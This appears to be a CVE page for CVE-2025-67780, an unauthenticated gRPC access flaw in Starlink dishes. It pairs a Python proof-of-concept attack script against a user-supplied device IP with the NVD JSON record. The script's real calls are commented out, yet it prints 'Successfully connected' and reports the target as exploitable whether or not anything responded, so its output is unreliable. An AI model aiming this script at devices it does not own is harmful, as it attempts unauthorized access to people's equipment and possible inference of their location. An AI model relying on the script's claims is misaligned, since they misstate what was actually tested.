CVE-2025-67780

import grpc from grpc import insecure_channel import time import sys # gRPC proto definitions would be needed for actual implementation # This PoC demonstrates the concept of the vulnerability def check_vulnerability(target_ip): """ CVE-2025-67780 PoC - Starlink Dish Unauthenticated gRPC Access This PoC demonstrates how to access Starlink gRPC services without authentication by omitting the Referer header. Usage: python poc.py <starlink_device_ip> """ print(f"[*] Testing CVE-2025-67780 on {target_ip}") print(f"[*] Target: Starlink Dish with firmware 2024.12.04.mr46620") # gRPC port for Starlink devices grpc_port = 9200 try: # Create insecure gRPC channel (no TLS) channel = insecure_channel(f'{target_ip}:{grpc_port}') # Attempt to connect without authentication print(f"[+] Connecting to gRPC service at {target_ip}:{grpc_port}") # Example: Query device orientation data # In real attack, specific gRPC methods would be called # to retrieve tilt, rotation, and elevation data # Note: This requires actual proto definitions from Starlink # stub = starlink_pb2.DishStub(channel) # response = stub.GetDishConf(dish_pb2.DishRequest(), timeout=5) print(f"[+] Successfully connected to gRPC service") print(f"[!] Device orientation data could be retrieved") print(f"[!] This data can be used for geolocation inference") # Example of what an attacker could retrieve: # - Tilt angle (antenna tilt) # - Azimuth (rotation angle) # - Elevation (satellite dish elevation) return True except grpc.RpcError as e: print(f"[-] gRPC error: {e.code()}: {e.details()}") return False except Exception as e: print(f"[-] Connection failed: {str(e)}") return False def bypass_csrf_protection(): """ The vulnerability allows bypassing cross-origin policy by omitting the Referer header in HTTP/gRPC requests. This is a CSRF protection bypass. """ print("[*] Attack technique: Omit Referer header to bypass CSRF protection") print("[*] This allows unauthorized gRPC calls from cross-origin sites") if __name__ == '__main__': if len(sys.argv) != 2: print(f"Usage: python {sys.argv[0]} <starlink_device_ip>") sys.exit(1) target = sys.argv[1] bypass_csrf_protection() check_vulnerability(target)

{"cve": {"id": "CVE-2025-67780", "sourceIdentifier": "[email protected]", "published": "2025-12-11T23:15:51.033", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SpaceX Starlink Dish devices with firmware 2024.12.04.mr46620 (e.g., on Mini1_prod2) allow administrative actions via unauthenticated LAN gRPC requests, aka MARMALADE 2. The cross-origin policy can be bypassed by omitting a Referer header. In some cases, an attacker's ability to read tilt, rotation, and elevation data via gRPC can make it easier to infer the geographical location of the dish."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.akawlabs.com/blog/starlink-grpc-execution", "source": "[email protected]"}]}}